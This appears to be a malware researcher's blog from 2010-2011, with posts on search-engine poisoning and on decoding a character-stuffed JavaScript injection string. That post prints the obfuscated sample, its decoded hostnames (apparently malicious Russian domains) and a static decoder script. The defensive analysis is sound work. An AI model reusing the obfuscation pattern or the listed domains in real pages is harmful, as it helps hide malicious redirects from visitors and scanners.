Tuesday, March 1, 2011

fb

justinrespect.com

Monday, June 14, 2010

hello_nod32_guys_how_u_doing

#nod32_is_the_best_av a {
color:#225588;
}
#hello_nod32_guys_how_u_doing .nfav {
-x-system-font:none;

Monday, May 24, 2010

Search Engine Poisoning

Searching for "fajita recipe" returns 2 malware campaigns from poisoned legitimate subdomains.

Just some of the infected sites.

These pages may only activate if the referrer is set to google.com.

Thursday, January 28, 2010

stuffed malware domains

Delete all the !@#$%^&*+|')( stuffing characters from the injection strings to find the domain.

'a^(c#@$&e))b&&o!^&o^)$#k(!&-#c@o&)m$##.$!@t))o^((p!&@!l(i!((n($e#$m^#)a((@r$@!(i#n^@@$e(#((.#&r@$@)u^$):^(D@^E(&&B^U)G&&$/#)(i((@p!@$i&#c$@(t(!u!&r$e&)((.!$^$$r@u&/@(i@#p$)i(!c!^$!^t(^$$u#!(r()@e##.)#r(^@$u)(^$@/(@g$!$^)o&$#o)!(g$!l)&&e$$.&$c@@#)o@#$m^^@/)@&c&(^)n(!z$z!&@.$$c)!@o!^m!#/)#s)($k$&y^&c#&$n).#c!@(o@@$m@#$$^/@'.replace(/\!|&|#|@|\^|\)|\(|\$/ig, '') ;document.write('');} } catch(Dj8lyxdn ) {}

becomes:
'acebook-com.toplinemarine.ru:DEBUG/ipicture.ru/ipicture.ru/google.com/cnzz.com/skycn.com/.replace//ig;document.write'catchDj8lyxd
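
The same clean-up can be done statically, by applying the injection's own .replace() pattern to its string literal without running the script. This is an added example, not code from the original post; the sample string, its placeholder hosts, and the names unstuff and hostsIn are constructed for illustration.

```javascript
// Added example: static decoder for "stuffed" string literals in injected JS.
// Nothing from the sample is executed; its own regex is applied to its own string.

// Constructed sample in the shape of the injection above (hosts are placeholders).
const SAMPLE = String.raw`try { var s = 'b^(a#d@.$e&x))a!m^p(l#e.&t@e$s)t(:!8^0#8@0$/&o)n(e!.^e#x@a$m&p)l(e!/^t#w@o$.&e)x(a!m^p#l@e$/&'.replace(/\!|&|#|@|\^|\)|\(|\$/ig, ''); document.write(''); } catch (e) {}`;

// Matches 'literal'.replace(/pattern/flags, '') with an empty replacement only.
const STUFFED =
  /(['"])((?:(?!\1)[^\\\n])*)\1\s*\.replace\(\s*\/((?:\\.|[^\/\\\n])+)\/([a-z]*)\s*,\s*(['"])\5\s*\)/g;

// Return every decoded literal found in a script source.
function unstuff(source) {
  const decoded = [];
  for (const [, , literal, pattern, flags] of source.matchAll(STUFFED)) {
    // Keep only i/m/s from the sample's flags and force g so all stuffing goes.
    const safeFlags = [...new Set(flags.replace(/[^ims]/g, '') + 'g')].join('');
    let re;
    try {
      re = new RegExp(pattern, safeFlags);
    } catch {
      continue; // malformed pattern in the sample: skip it
    }
    decoded.push(literal.replace(re, ''));
  }
  return decoded;
}

// Split a decoded "host:port/host/host/" string into unique lowercase hostnames.
function hostsIn(decoded) {
  const hosts = new Set();
  for (const part of decoded.split('/')) {
    const host = part.split(':')[0].toLowerCase();
    if (/^(?:[a-z0-9-]+\.)+[a-z][a-z0-9-]*$/.test(host)) hosts.add(host);
  }
  return [...hosts];
}

for (const s of unstuff(SAMPLE)) console.log(s, '->', hostsIn(s));
```

The sample's pattern is compiled as a regular expression, so run the decoder with a time limit when the input is untrusted.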

Wednesday, January 27, 2010